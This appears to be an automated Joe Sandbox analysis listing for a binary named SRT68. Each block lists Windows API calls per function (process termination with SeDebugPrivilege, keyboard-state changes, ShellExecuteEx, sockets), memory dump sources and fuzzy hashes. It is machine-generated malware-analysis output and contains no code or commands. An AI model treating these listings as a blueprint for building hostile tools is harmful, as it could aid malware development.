                                                                      • Opcode Fuzzy Hash: da0eeb744b6c5ccbf5b07686ad46190225736f0a9dbb0ba949518ee750a2ac7c
                                                                      • Instruction Fuzzy Hash: BB91B171A00205ABDF24CFA5C858FAEBBB8EF45718F00855DF945AB284D7789941CFA0
                                                                      APIs
                                                                        • Part of subcall function 00FF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                        • Part of subcall function 00FF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                        • Part of subcall function 00FF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                        • Part of subcall function 00FF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01019806
                                                                      • _memset.LIBCMT ref: 01019813
                                                                      • _memset.LIBCMT ref: 01019956
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01019982
                                                                      • CoTaskMemFree.OLE32(?), ref: 0101998D
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 010199DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1300414916-2785691316
                                                                      • Opcode ID: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
                                                                      • Instruction ID: 05ae456b2acc661ba762162f66d90ded8761c7729de8546978293831f6e4c934
                                                                      • Opcode Fuzzy Hash: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
                                                                      • Instruction Fuzzy Hash: 33914771D00229EBDB10DFA5CC90EDEBBB9AF09750F20415AF519A7281DB75AA04CFA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01026E24
                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 01026E38
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01026E52
                                                                      • _wcscat.LIBCMT ref: 01026EAD
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 01026EC4
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01026EF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat
                                                                      • String ID: SysListView32
                                                                      • API String ID: 307300125-78025650
                                                                      • Opcode ID: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
                                                                      • Instruction ID: 2fd6813256b350b24433cd9e55ef0c07f2093da32bb578aa2dae33c1c89e5bec
                                                                      • Opcode Fuzzy Hash: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
                                                                      • Instruction Fuzzy Hash: 8F41A170900319EBEF219F68CC85FEE77F8EF08390F10046AF9C5A7291D67699848B60
                                                                      APIs
                                                                        • Part of subcall function 01003C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01003C7A
                                                                        • Part of subcall function 01003C55: Process32FirstW.KERNEL32(00000000,?), ref: 01003C88
                                                                        • Part of subcall function 01003C55: CloseHandle.KERNEL32(00000000), ref: 01003D52
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9A4
                                                                      • GetLastError.KERNEL32 ref: 0101E9B7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9E6
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0101EA63
                                                                      • GetLastError.KERNEL32(00000000), ref: 0101EA6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0101EAA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
                                                                      • Instruction ID: 348961450ca891f57e37b6f94e895883f3f6cdbc69f6b01e552be25b14dc9305
                                                                      • Opcode Fuzzy Hash: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
                                                                      • Instruction Fuzzy Hash: F941CE712002019FDB26EF14CC95F6EBBE5AF45314F588458FA829F2D6CBBDA804DB91
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 01003033
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
                                                                      • Instruction ID: c4f4c100978cd1aa8c6e603fa05dcb4726524e89e426772a1ff0762bfcd29b09
                                                                      • Opcode Fuzzy Hash: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
                                                                      • Instruction Fuzzy Hash: A7114631249346BEF757CA19DC42D6F3B9CEF05360F10406EFE40AA1C2DA645A0046A0
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01004312
                                                                      • LoadStringW.USER32(00000000), ref: 01004319
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0100432F
                                                                      • LoadStringW.USER32(00000000), ref: 01004336
                                                                      • _wprintf.LIBCMT ref: 0100435C
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0100437A
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 01004357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 3648134473-3128320259
                                                                      • Opcode ID: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
                                                                      • Instruction ID: 0fde3e72510e1534c5b68c354edb2f20e9d58da341cb7770b2a3d2476990d819
                                                                      • Opcode Fuzzy Hash: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
                                                                      • Instruction Fuzzy Hash: EF01A2F2900209BFE7719BA0DD89EEB777CEB08240F504095FB89E2041EA395E844B74
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0102D47C
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0102D49C
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0102D6D7
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0102D6F5
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0102D716
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0102D735
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0102D75A
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0102D77D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
                                                                      • Instruction ID: 3e5228dcbb32cd525ff821c07a5fc2cab25d472005d792c2b978813c9a2953d7
                                                                      • Opcode Fuzzy Hash: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
                                                                      • Instruction Fuzzy Hash: 3AB17C71500225AFDF24CFA8C5897AD7BF1FF48701F0480A9ED889F299E779A950CB90
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101FDEE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3479070676-0
                                                                      • Opcode ID: 3a668c07f4865e9070e79f1a65ddcb3b3d1c2687f5e26eba5c4abac0e4a4d4d3
                                                                      • Instruction ID: 37e7a7a203bc4cbd23e79523fb4be66fdb884d642f119f156ffa65e4d6000574
                                                                      • Opcode Fuzzy Hash: 3a668c07f4865e9070e79f1a65ddcb3b3d1c2687f5e26eba5c4abac0e4a4d4d3
                                                                      • Instruction Fuzzy Hash: 80A180712042029FDB10EF18CC90F6EBBE5AF45314F14841CF9969B292DB79E949DF41
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FA2ACF
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FA2B17
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC21A
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC286
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 26c1ff5b1fa326d4aa158779978073628c37822ca70ddcc3fcef75fdd2210497
                                                                      • Instruction ID: 667715faa497d45fee4e0aa471e90f4e7316cce3bb68e9f605b045672d765ef2
                                                                      • Opcode Fuzzy Hash: 26c1ff5b1fa326d4aa158779978073628c37822ca70ddcc3fcef75fdd2210497
                                                                      • Instruction Fuzzy Hash: 1141F172B046819BC7B55B3C9D8CB6B7BA3BF87360F28841DE08786551C67D9841F750
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 010070DD
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01007114
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 01007130
                                                                      • _memmove.LIBCMT ref: 0100717E
                                                                      • _memmove.LIBCMT ref: 0100719B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 010071AA
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010071BF
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 010071DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 256516436-0
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 010261EB
                                                                      • GetDC.USER32(00000000), ref: 010261F3
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010261FE
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0102620A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01026246
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01026257
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0102902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01026291
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010262B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                      • _wcstok.LIBCMT ref: 0100EC94
                                                                      • _wcscpy.LIBCMT ref: 0100ED23
                                                                      • _memset.LIBCMT ref: 0100ED56
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 774024439-3081909835
                                                                      APIs
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01016C00
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01016C21
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 01016C34
                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 01016CEA
                                                                      • inet_ntoa.WSOCK32(?), ref: 01016CA7
                                                                        • Part of subcall function 00FFA7E9: _strlen.LIBCMT ref: 00FFA7F3
                                                                        • Part of subcall function 00FFA7E9: _memmove.LIBCMT ref: 00FFA815
                                                                      • _strlen.LIBCMT ref: 01016D44
                                                                      • _memmove.LIBCMT ref: 01016DAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3619996494-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      APIs
                                                                      • IsWindow.USER32(015855C0), ref: 0102B3EB
                                                                      • IsWindowEnabled.USER32(015855C0), ref: 0102B3F7
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0102B4DB
                                                                      • SendMessageW.USER32(015855C0,000000B0,?,?), ref: 0102B512
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0102B54F
                                                                      • GetWindowLongW.USER32(015855C0,000000EC), ref: 0102B571
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0102B589
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0101F448
                                                                      • _memset.LIBCMT ref: 0101F511
                                                                      • ShellExecuteExW.SHELL32(?), ref: 0101F556
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                      • GetProcessId.KERNEL32(00000000), ref: 0101F5CD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0101F5FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                      • String ID: @
                                                                      • API String ID: 3522835683-2766056989
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 01000F8C
                                                                      • GetKeyboardState.USER32(?), ref: 01000FA1
                                                                      • SetKeyboardState.USER32(?), ref: 01001002
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 01001030
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0100104F
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 01001095
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010010B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 01000DA5
